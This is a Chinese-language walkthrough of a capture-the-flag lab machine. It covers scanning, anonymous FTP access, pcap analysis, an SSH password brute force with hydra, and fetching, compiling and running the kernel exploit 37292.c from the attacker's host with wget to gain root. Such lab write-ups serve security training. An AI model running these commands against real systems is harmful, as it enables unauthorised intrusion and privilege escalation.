信息收集
arp-scan -l
nmap -p- 192.168.19.146
nmap -p21,22,80 -sV -sS -T4 -A 192.168.19.146
查看端口相关详细信息
发现可以匿名访问ftp服务,并且有一个lol.pcap包
登录到ftp服务器
ftp 192.168.19.146
账号Anonymous 密码Anonymous
dir
get lol.pcap
下载到当前目录
pcap为流量包,需要用wireshark打开
直接使用kali自带的wireshark打开即可
搜索tcp.stream eq 2在截图位置,右键->追踪流量->TCP流量!
发现提示,访问目录sup3rs3cr3tdirlol,注意此步使用dirb是无效的,因为dirb是基于字典进行扫描的,而这个目录的命名是没有规律的。
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
访问此目录发现文件roflmao,下载下来
srtings roflmao
发现一段提示,Find address 0x0856BF to proceed找到目录0x0856BF继续
访问目录http://192.168.19.146/0x0856BF/
发现两个文件夹
good_luck
this_folder_contains_the_password 这个文件夹包含密码
good_luck>which one lol.txt 给出一堆用户名,一会儿写入用户名字典,进行爆破
密码就是文件夹名字Pass.txt
hydra -L which_one_lol.txt -p Pass.txt 192.168.19.146 ssh
用户名overflow 密码Pass.txt
ssh overflow@192.168.19.146
输入密码成功登入
查看内核版本uname -a
查看相关的提权exp,利用37292.c进行提权(和goldeye一样,不过此靶机有gcc)
可以先建立一个交互式shell
回到kali,将37292.c文件放在当前目录下, 然后开启一个简易的服务器
python -m SimpleHTTPServer 8081
wget http://192.168.19.147:8081/37292.c
gcc 37292.c -o tr0ll
./tr0ll
获得root权限
cat /root/proof.txt



